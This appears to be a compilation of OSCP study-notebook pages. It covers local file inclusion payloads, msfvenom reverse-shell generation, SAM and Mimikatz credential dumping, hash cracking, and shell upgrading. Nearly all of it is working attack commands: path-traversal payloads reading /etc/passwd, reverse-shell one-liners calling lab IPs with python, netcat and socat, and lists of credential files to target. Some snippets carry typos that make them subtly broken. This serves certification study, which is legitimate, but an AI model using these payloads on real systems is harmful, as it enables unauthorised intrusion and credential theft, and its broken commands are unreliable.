Let's consider following code: Copy $file = $_GET['page']; require_once("/var/www/$file.php"); Now if we inject /etc/passwd in it , it will look something like this - Copy passwd = $_GET['page']; require_once("/var/www/../../../etc/passwd.php"); In this case **we cannot conduct File Inclusion with the passwd file because the second line appends a PHP extension to the file name and effectively converts the passwd file to passwd.php** which would result in a ‘file not found error’. In such a case, **we can add a null byte to the passwd file name to terminate the string at the null byte and discard the ‘.php’ extension.** [](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi/null-byte-injection#null-byte) Null Byte ---------------------------------------------------------------------------------------------------------- Copy http://website/page=../../../etc/passwd%00 http://example.com/page=../../../../../../etc/passwd? /etc/passwd%00jpg [PreviousInteresting Files for LFI](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi/untitled) [NextPHP Wrappers](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi/php-wrappers) Last updated 4 years ago --- # PHP Wrappers | OSCP Notes PHP provides several protocol wrappers that we can use to exploit directory traversal and local file inclusion. These filters give us additional flexibility when attempting to inject PHP code via LFI vulnerabilities. [](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi/php-wrappers#identifying-vulnerability) Identifying Vulnerability ----------------------------------------------------------------------------------------------------------------------------------- Copy http://192.168.112.132/menu.php?file=data:text/plain,helloworld IF this payload return **helloworld** then we can use php wrappers to execute php commands too [](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi/php-wrappers#executing-commands) Executing commands --------------------------------------------------------------------------------------------------------------------- Copy http://192.168.112.132/menu.php?file=data:text/plain, [](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi/php-wrappers#php-filter) php filter ----------------------------------------------------------------------------------------------------- Another PHP wrapper, `php://filter` in this example the output is encoded using base64, so you’ll need to decode the output. Copy http://192.168.155.131/fileincl/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd [PreviousNull Byte Injection](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi/null-byte-injection) [NextShellShock](https://gabb4r.gitbook.io/oscp-notes/web-http/shellshock) Last updated 4 years ago --- # msfvenom | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#list-available-formats) List available formats ---------------------------------------------------------------------------------------------------------- Copy msfvenom --list formats [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#list-available-payloads-for-specific-platform) List available payloads for specific platform -------------------------------------------------------------------------------------------------------------------------------------------------------- Copy msfvenom --payload --list-options | grep windows [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#windows) Windows ---------------------------------------------------------------------------- ### [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#bat-reverse-shell) bat reverse shell mostly used with **JuicyPotato** exploit Copy msfvenom -p cmd/windows/reverse_powershell lhost=10.10.12.15 lport=4444 > shell.bat ### [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#exe-reverse-shell) exe reverse shell Copy msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe ### [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#powershell) Powershell Copy msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1 ### [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#x64-bit-payload) x64 Bit payload Copy msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe ### [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#embedded-payload) Embedded payload Copy msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe # Windows reverse shell embedded into plink [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#linux) Linux ------------------------------------------------------------------------ ### [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#bind-shell) bind shell Copy msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c ### [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#reverse-shell) reverse shell Copy msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f c [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#undefined) --------------------------------------------------------------------- [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#other-platforms) Other Platforms -------------------------------------------------------------------------------------------- ### [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#php-reverse-shell) php reverse shell Copy msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php ### [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#aspx-reverse-shell) aspx reverse shell Copy msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.16.3 LPORT=4444 > shell.aspx ### [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#java-war-reverse-shell) Java WAR reverse shell Most time will used to get shell on tomcat Copy msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war ### [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#jsp-reverse-shell) jsp reverse shell Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f raw > shell.jsp ### [](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom#python-reverse-shell) python reverse shell Copy msfvenom -p cmd/unix/reverse_python LHOST="10.0.0.1" LPORT=4242 -f raw > shell.py [PreviousUpgrading shell](https://gabb4r.gitbook.io/oscp-notes/shell/upgrading-shell) [NextLinux Manual Exploitation](https://gabb4r.gitbook.io/oscp-notes/linux-post-exploitation/linux-commands) Last updated 4 years ago --- # Dumping the sam file | OSCP Notes **Windows stores password hashes in the Security Account Manager (SAM).** The hashes are encrypted with a key which can be found in a file named SYSTEM. If you have the ability to read the SAM and SYSTEM files, you can extract the hashes. A very common way of capturing hashed passwords on older Windows systems is to dump the Security Account Manager (SAM) file. The Security Account Manager is a database file in Windows XP, Windows Vista, Windows 7, 8.1 and 10 that stores user passwords. It can be used to authenticate local and remote users on the system. [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/dumping-the-sam-file#sam-system-locations) **SAM/SYSTEM Locations** ------------------------------------------------------------------------------------------------------------------------------------------ Copy C:\Windows\System32\config C:\Windows\Repair C:\Windows\System32\config\RegBack # Backup files , can be found [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/dumping-the-sam-file#extracting-password-hashes-from-sam-file) Extracting Password hashes from SAM file ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ The SAM file cannot be accessed directly while Windows is running because it’s locked by the Windows operating system. However, **there are several tools available for extracting the password hashes from memory such as pwdump, fgdump** and, if you have a Meterpreter session on the system (or you set one up), you can also use the hashdump post-exploitation module. ### [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/dumping-the-sam-file#fgdump.exe) **fgdump.exe** Copy /usr/share/windows/windows-binaries/fgdump/fgdump.exe Transfer it to target and run it , **and '**127.0.0.pwdump' file will created in the same directory with hashes inside it ### [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/dumping-the-sam-file#cracking-hashes-with-john) Cracking hashes with john Copy john --wordlist=/usr/share/john/password.lst /root/Desktop/hashes.txt ### [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/dumping-the-sam-file#mimikatz-need-admin-access) Mimikatz **(Need Admin Access)** **Executing mimikatz** Copy mimikatz.exe -m #### [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/dumping-the-sam-file#extracting-password-with-sekurlsa) Extracting password with sekurlsa To interact with LSASS and capture credentials from memory, Mimikatz needs: * An administrator account to get debug privileges via **privilege::debug,** or; * A SYSTEM account via post exploitation/privilege escalation. In this case the debug privilege is not necessary. Copy $ privilege::debug Privilege ‘20’ OK When the user account that is **running Mimikatz does not have administrative privileges and is therefore unable to access the LSASS service,** Mimikatz will throw the following error: **Error: ERROR kuhl\_m\_privilege\_simple ; RtlAdjustPrivilege (20) c0000061** Note: If you’re running the debug command on a shell as NT AUTHORITY/SYSTEM, Mimikatz will also throw an error but it won’t prevent you from accessing LSASS with Mimikatz to dump credentials: **ERROR kuhl\_m\_privilege\_simple ; RtlAdjustPrivilege (20) c0000022** Copy lsadump::sam sekurlsa::logonpasswords We can use this dumped hashes with `pth-winexe` to gain access [PreviousManual Exploitaion](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/manual-exploitaion) [NextSUDO SU](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/sudo-su) Last updated 4 years ago --- # Windows Exploit Suggester | OSCP Notes * There’s a Windows version of Linux Exploit Suggester called, as you might expect, Windows Exploit Suggester. This is a tool for identifying missing patches on the Windows target which may indicate possible vulnerabilities. The tool takes the output from the ‘systeminfo’ command and compares the target’s patch levels (hotfixes installed) against the latest version of the Microsoft vulnerability database (the vulnerability database is automatically downloaded and stored as an Excel spreadsheet). Based on this comparison the tool suggests possible public exploits (marked with an E) and Metasploit modules (marked with an M) that may work against the unpatched system. [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/windows-exploit-suggester#github) Github --------------------------------------------------------------------------------------------------------------- Copy git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/windows-exploit-suggester#updating-the-database) Updating the database --------------------------------------------------------------------------------------------------------------------------------------------- Copy python windows-exploit-suggester.py --update [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/windows-exploit-suggester#getting-system-information) Getting system information ------------------------------------------------------------------------------------------------------------------------------------------------------- Run following command in target window and save the output in text file, Copy CMD> systeminfo [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/windows-exploit-suggester#running-wes-to-check-for-any-known-vulnerabilities) Running WES to check for any known vulnerabilities ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Copy python windows-exploit-suggester.py --database 2018-02-08-mssb.xls --systeminfo sysinfo.txt [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/windows-exploit-suggester#wmi-hotfix) WMI hotfix ----------------------------------------------------------------------------------------------------------------------- If you’re **unable to read the hotfixes installed from the ‘systeminfo’ command** then you can also try using the WMI command-line (WMIC) utility. Run the following command on the target Windows host to retrieve a list of installed hotfixes: Copy wmic qfe list full store it as **hotfixes.txt** and run window exploit suggester Copy python windows-exploit-suggester.py --database 2018-02-08-mssb.xls --systeminfo sysinfo.txt -- hotfixes hotfixes.txt Note: In March 2017 Microsoft stopped maintaining the security bulletin search. This means the Windows Exploit Suggester database will not include any vulnerabilities or exploits found after that date. However, this tool can still be very useful for older systems. It is also possible, with some considerable effort, to create your own spreadsheet reflecting more recent vulnerabilities. These spreadsheets can be exported with Microsoft Security Guidance, including update replacement information from the API, it's still possible to create a recent vulnerability spreadsheet with some efforts. [PreviousAutomated enumeration script](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/automated-enumeration-script) [NextGeneral](https://gabb4r.gitbook.io/oscp-notes/file-transfer/general) Last updated 4 years ago --- # Interesting Files for LFI | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi/untitled#linux) Linux --------------------------------------------------------------------------------------- Copy /etc/passwd /etc/shadow /etc/issue /etc/group /etc/hostname ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi/untitled#log-files) Log Files Copy Apache access log: /var/log/apache/access.log Apache access log: /var/log/apache2/access.log Apache access log: /var/log/httpd/access_log Apache error log: /var/log/apache/error.log Apache error log: /var/log/apache2/error.log Apache error log: /var/log/httpd/error_log General messages and system related entries: /var/log/messages Cron logs: /var/log/cron.log Authentication logs: /var/log/secure or /var/log/auth.log ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi/untitled#cms-configuration-files) **CMS configuration files** The following files are configuration files for popular content management systems. When a target is running any of these CMS systems you can try to include their configuration files as they often contain sensitive information, such as (root) credentials used to access the database. Copy WordPress: /var/www/html/wp-config.php Joomla: /var/www/configuration.php Dolphin CMS: /var/www/html/inc/header.inc.php Drupal: /var/www/html/sites/default/settings.php Mambo: /var/www/configuration.php PHPNuke: /var/www/config.php PHPbb: /var/www/config.php [](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi/untitled#windows) Windows ------------------------------------------------------------------------------------------- To verify LFI on Windows systems a very common file we can attempt to include is the hosts file in the following directory: Copy C:/Windows/System32/drivers/etc/hosts From the privilege escalation chapter, we’ve learned that the ‘Unattended.xml’ files on Windows systems may contain credentials for privileged accounts, such as the administrator or even the domain administrator. If an attacker is able to include such files it could easily result in (domain) administrator access to the system or network, for example by using the credentials to authenticate with Remote Desktop Services. The following files of interest can (sometimes) be found on Windows systems which may contain passwords and other sensitive information: Copy C:/Windows/Panther/Unattend/Unattended.xml C:/Windows/Panther/Unattended.xml C:/Windows/Panther/Unattend.txt C:/Unattend.xml C:/Autounattend.xml C:/Windows/system32/sysprep Another directory with potentially interesting files is the web root directory: Copy C:/inetpub/wwwroot/ C:/inetpub/wwwroot/web.config C:/inetpub/logs/logfiles/ The following files of interest can (sometimes) be found on Windows systems: Copy C:/documents and settings/administrator/desktop/desktop.ini C:/documents and settings/administrator/ntuser.dat C:/documents and settings/administrator/ntuser.ini C:/users/administrator/desktop/desktop.ini C:/users/administrator/ntuser.dat C:/users/administrator/ntuser.ini C:/windows/windowsupdate.log ### [](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi/untitled#xampp) XAMPP Copy C:/xampp/apache/conf/httpd.conf C:/xampp/security/webdav.htpasswd C:/xampp/apache/logs/access.log C:/xampp/apache/logs/error.log C:/xampp/tomcat/conf/tomcat-users.xml C:/xampp/tomcat/conf/web.xml C:/xampp/webalizer/webalizer.conf C:/xampp/webdav/webdav.txt C:/xampp/apache/bin/php.ini C:/xampp/apache/conf/httpd.conf [PreviousLFI and RFI](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi) [NextNull Byte Injection](https://gabb4r.gitbook.io/oscp-notes/web-http/lfi-and-rfi/null-byte-injection) Last updated 4 years ago --- # Cracking Password | OSCP Notes [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password#identify-hash) Identify hash ------------------------------------------------------------------------------------------------------------ In kali, Copy hash-identifier Copy hashid Online, * [**https://www.tunnelsup.com/hash-analyzer/**](https://www.tunnelsup.com/hash-analyzer/) * [http://www.onlinehashcrack.com/hash-identification.php](http://www.onlinehashcrack.com/hash-identification.php) * [https://md5hashing.net/hash\_type\_checker](https://md5hashing.net/hash_type_checker) [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password#online-tools) Online tools ---------------------------------------------------------------------------------------------------------- #### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password#findmyhash) findmyhash Copy findmyhash LM -h 6c3d4c343f999422aad3b435b51404ee:bcd477bfdb45435a34c6a38403ca4364 #### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password#cracking) Cracking * Crackstation [https://crackstation.net/](https://crackstation.net/) * Hashkiller [https://hashkiller.co.uk/](https://hashkiller.co.uk/) * Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF [](https://www.onlinehashcrack.com/) * Google hashes Search pastebin. [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password#md5-hash) MD5 Hash -------------------------------------------------------------------------------------------------- Copy john --wordlist=/usr/share/wordlists/rockyou.txt -format=Raw-MD5 /root/Desktop/john.txt [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password#etc-shadow-root-hashes) /etc/shadow root hashes ------------------------------------------------------------------------------------------------------------------------------- Copy $ echo '$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVl aXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0' > hash.txt' $ john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.t xt hash.txt [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password#linux-shadow-passwd) Linux shadow passwd ------------------------------------------------------------------------------------------------------------------------ Copy $ unshadow passwd-file.txt shadow-file.txt > unshadowed.txt $ john --rules --wordlist=wordlist.txt unshadowed.txt [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password#id_rsa) id\_rsa ----------------------------------------------------------------------------------------------- Copy # First convert the private key into hash format with ssh2john ssh2john id_rsa > id_rsa.hash # And then use john to crack it - john --wordlist=darkweb2017-top10.txt id_rsa.hash [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password#window-sam-file) Window SAM file ---------------------------------------------------------------------------------------------------------------- Copy john --wordlist=/usr/share/john/password.lst /root/Desktop/hashes.txt [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password#others-file-format) Others file format ---------------------------------------------------------------------------------------------------------------------- ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password#zip) zip Copy fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip Copy zip2john file.zip > zip.john john zip.john ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password#id-7z) 7z Copy cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z Copy #Download and install requirements for 7z2john wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl apt-get install libcompress-raw-lzma-perl ./7z2john.pl file.7z > 7zhash.john ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password#pdf) PDF Copy apt-get install pdfcrack pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt #pdf2john didnt worked well, john didnt know which hash type was Copy #To permanently decrypt the pdf sudo apt-get install qpdf qpdf --password= --decrypt encrypted.pdf plaintext.pdf ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password#jwt) JWT Copy git clone https://github.com/Sjord/jwtcrack.git cd jwtcrack Copy #Bruteforce using crackjwt.py python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt Copy #Bruteforce using john python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john john jwt.john #It does not work with Kali-John ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password#ntlm-cracking) NTLM cracking Copy Format:USUARIO:ID:HASH_LM:HASH_NT::: jhon --wordlist=/usr/share/wordlists/rockyou.txt --fomrat=NT file_NTLM.hashes hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot ### [](https://gabb4r.gitbook.io/oscp-notes/password-attacks/cracking-password#keepass) Keepass Copy sudo apt-get install -y kpcli #Install keepass tools like keepass2john keepass2john file.kdbx > hash #The keepass is only using password keepass2john -k file.kdbx > hash # The keepas is also using a file as a needed credential Copy #The keepass can use password and/or a file as credentials, if it is using both you need to provide them to keepass2john john --wordlist=/usr/share/wordlists/rockyou.txt hash [PreviousBrute-force service password](https://gabb4r.gitbook.io/oscp-notes/password-attacks/brute-force-service-password) [NextCustom Worldlist](https://gabb4r.gitbook.io/oscp-notes/password-attacks/custom-worldlist) Last updated 4 years ago --- # Upgrading shell | OSCP Notes Netcat is a great tool, but it also has its shortcoming - * Hitting “Ctrl-C”, for instance, drops the entire shell instead of canceling the current command as on a regular terminal shell; * You cannot run interactive commands like su to log into other local accounts or SSH to connect to other hosts; * Text editors like Vim and Nano cannot be used properly to edit files (only non-interactively); * Features like job control, tab complete and command history with the up-arrow are also missing. **To overcome some of these problems we need to switch to an interactive TTY (i.e. terminal) shell.** [](https://gabb4r.gitbook.io/oscp-notes/shell/upgrading-shell#different-pty-modules) **Different PTY modules** ------------------------------------------------------------------------------------------------------------------- ### [](https://gabb4r.gitbook.io/oscp-notes/shell/upgrading-shell#python-pty-module) Python pty module Copy python -c 'import pty; pty.spawn("/bin/sh")' python3 -c 'import pty; pty.spawn("/bin/sh")' python3 -c 'import pty; pty.spawn("/bin/bash")' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(), *$ 1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ### [](https://gabb4r.gitbook.io/oscp-notes/shell/upgrading-shell#perl) Perl Copy perl —e 'exec "/bin/sh";' ### [](https://gabb4r.gitbook.io/oscp-notes/shell/upgrading-shell#using-socat) Using socat On Kali (listen): Copy socat file:`tty`,raw,echo=0 tcp-listen:4444 On Victim (launch): Copy socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 If not download in Victim: Copy wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 ### [](https://gabb4r.gitbook.io/oscp-notes/shell/upgrading-shell#other-ways) Other ways Copy /bin/sh -i echo os.system('/bin/bash') exec "/bin/sh"; ### [](https://gabb4r.gitbook.io/oscp-notes/shell/upgrading-shell#related-shell-escape-sequences) Related Shell Escape Sequences Vi / Vim Copy :!bash Copy :set shell=/bin/bash :shell awk Copy awk 'BEGIN {system("/bin/bash")}' find Copy find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \ [](https://gabb4r.gitbook.io/oscp-notes/shell/upgrading-shell#netcat-magic) **Netcat Magic** ------------------------------------------------------------------------------------------------- 1.First spawn a PTY shell with python or with bash , Copy python -c 'import pty; pty.spawn("/bin/bash")' 2\. Background the process with **Ctrl-z** ![](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2F3331885100-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-MkfTlo0T97eXbWuX_cT%252F-Mkk9KK6fkNzF6GVmGoT%252F-MkkAL2eNpt0KmnJzrvV%252Fimage.png%3Falt%3Dmedia%26token%3D183501f6-368d-4ba2-a837-22eed45cdb1a&width=768&dpr=4&quality=100&sign=2d46fb5a&sv=2) 3\. Examine the current terminal and STTY info so we can force the connected shell to match it: Copy stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/' The information needed is the size of the current TTY (_“Example: rows 38; columns 116”_) 4\. With the shell still backgrounded, now set the current STTY to type raw and tell it to echo the input characters with the following command: Copy stty raw -echo With a raw stty, input/output will look weird and you won’t see the next commands, but as you type they are being processed. 5\. Next foreground the shell with `fg`. It will re-open the reverse shell but formatting will be off. Finally, reinitialize the terminal with enter button 6\. After the `reset` the shell should look normal again. The last step is to set the shell, terminal type and stty size to match our current Kali window (from the info gathered above) Copy $ export SHELL=bash $ export TERM=xterm256-color $ stty rows 38 columns 116 ![](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2F3331885100-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-MkfTlo0T97eXbWuX_cT%252F-Mkk9KK6fkNzF6GVmGoT%252F-MkkBIUGDudcnVQ5AIzG%252Fimage.png%3Falt%3Dmedia%26token%3D1456175e-b99e-4955-a793-f845ac052f93&width=768&dpr=4&quality=100&sign=7b2014fb&sv=2) The end result is a fully interactive TTY with all the features we’d expect (tab-complete, history, job control, etc) all over a netcat connection :) ### [](https://gabb4r.gitbook.io/oscp-notes/shell/upgrading-shell#obtaining-a-full-interactive-shell-with-zsh) **Obtaining a full interactive shell with zsh** **Current kali terminal come with zsh shell so it's important to learn this method as above will not work with zsh shell** 1.Get tty shell with above commands and then background the process with **ctrl+z** 2\. Get the number of rows and columns with Copy stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/' 3\. To ignore hotkeys in the local shell and return to your reverse shell, enter Copy stty raw -echo; fg # Note: For zsh users it is important to enter this in one line! 4\. Configure your rows and columns Copy stty rows cols 5\. Export term Copy export TERM=xterm-256color 6\. All you need to do now, is reload your shell: Copy exec /bin/bash [PreviousBind and Reverse shell](https://gabb4r.gitbook.io/oscp-notes/shell/bind-and-reverse-shell) [Nextmsfvenom](https://gabb4r.gitbook.io/oscp-notes/shell/msfvenom) Last updated 4 years ago --- # Searchsploit | OSCP Notes **SearchSploit** is a command-line search tool for Exploit-DB that allows you to take a copy of the Exploit Database with you. Searchsploit is included in the Exploit Database repository on GitHub. SearchSploit is very useful for security assessments when you don’t have Internet access because it gives you the power to perform detailed offline searches for exploits in the saved Exploit-DB. [](https://gabb4r.gitbook.io/oscp-notes/exploitaion/searchsploit#update-the-database) Update the database -------------------------------------------------------------------------------------------------------------- Copy searchsploit -u [](https://gabb4r.gitbook.io/oscp-notes/exploitaion/searchsploit#searching-exploit) Searching Exploit ---------------------------------------------------------------------------------------------------------- Copy searchsploit windows local [](https://gabb4r.gitbook.io/oscp-notes/exploitaion/searchsploit#copy-exploit-to-the-current-path) Copy exploit to the current path ---------------------------------------------------------------------------------------------------------------------------------------- Copy searchsploit -m 40418.py . [](https://gabb4r.gitbook.io/oscp-notes/exploitaion/searchsploit#get-information-about-exploit) Get information about exploit ---------------------------------------------------------------------------------------------------------------------------------- Copy searchsploit -x 40418.py Tip: You can use the **\--exclude=** flag to filter out unwanted results from your search. For instance, to exclude DoS exploits use: Remove DoS exploits by adding the following flag: --exclude="/dos/" [PreviousCustom Worldlist](https://gabb4r.gitbook.io/oscp-notes/password-attacks/custom-worldlist) [NextCompiling the Exploit](https://gabb4r.gitbook.io/oscp-notes/exploitaion/compiling-the-exploit) Last updated 4 years ago --- # Netcat | OSCP Notes * TCP/IP Swiss Army Knife - we will use this tool alot * Can scan ports but can also be used for: * chatting between two computers * banner grabbing * file transfer * for shell * Traffic is not encrypted ( unless you use **ncat**) [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/netcat#banner-grabbing) Banner Grabbing ----------------------------------------------------------------------------------------------- Copy nc -v google.com 80 it will connect nc to google server if port 80 is open and then we can query it manually for example ![](https://gabb4r.gitbook.io/oscp-notes/~gitbook/image?url=https%3A%2F%2F3331885100-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-legacy-files%2Fo%2Fassets%252F-MkfTlo0T97eXbWuX_cT%252F-MkmHETOG-_mdJ5bh837%252F-MkmHXqYrcINKpcJd7AD%252Fimage.png%3Falt%3Dmedia%26token%3D2d18ca29-5017-4a38-a39f-11cb1ef36e88&width=768&dpr=4&quality=100&sign=284f203b&sv=2) after connecting , we can use http parameters like **GET, HEAD, OPTIONS etc** to send the request and server will return the response [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/netcat#netcat-without-e-flag) Netcat without -e flag ------------------------------------------------------------------------------------------------------------ Copy rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f [](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/netcat#port-scanning) Port Scanning ------------------------------------------------------------------------------------------- Copy nc -nv -w 1 -z 192.168.1.1 1-1024 -nv = doesn't resolve dns -w 1 = sets timeout to 1 second -z = specifies zone transfer -u = UDP mode (can be unreliable) [PreviousFind Command Cheatsheet](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/find-command-cheatsheet) [NextSQL Injection Bypass](https://gabb4r.gitbook.io/oscp-notes/cheatsheet/sql-injection-bypass) Last updated 4 years ago --- # SUDO SU | OSCP Notes * If you have ever used linux, then probably you are aware of sudo command.This command basically let us run a command as different user,mostly as the root user.On certain linux distros, by using su command we can login as the root user. However this command is very dangerous, hence it is disabled by default in most of the linux distros such as Ubuntu. * _So while Linux users have the sudo command to switch user account or run commands as super user, what does Windows users have?_ But we have below alternatives to that. 1. _**Runas command**_ 2. _**Powershell script for switching user**_ [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/sudo-su#when-we-can-use-it) When we can use it ? ----------------------------------------------------------------------------------------------------------------------- * Not a big deal, suppose we have hacked into a windows system through any of the vulnerabilities of network or web application and have low privileged user shell. * And also we have got some Administrator credentials through hacking any other system in the domain by **hashdump**, **wce.exe**, **fgdump.exe** or any other tool. [](https://gabb4r.gitbook.io/oscp-notes/windows-post-exploitation/sudo-su#example) Example ----------------------------------------------------------------------------------------------- * Suppose credentials are `b33f:b33fpassword` * _So the point to be noted here is — There maybe times when we know the credentials of admin user, but will have a low privileged shell as some other user, Also remote desktop will not be enabled to login as other user. Unlike Linux, we cannot sudo on windows machines, hence we use switch user functionality._ * So the first thing we always check after getting low privileged shell on windows system is whoami? Copy whoami echo %username% * then the next thing would be to check all the user accounts and the privileges given to each of them. Copy net users 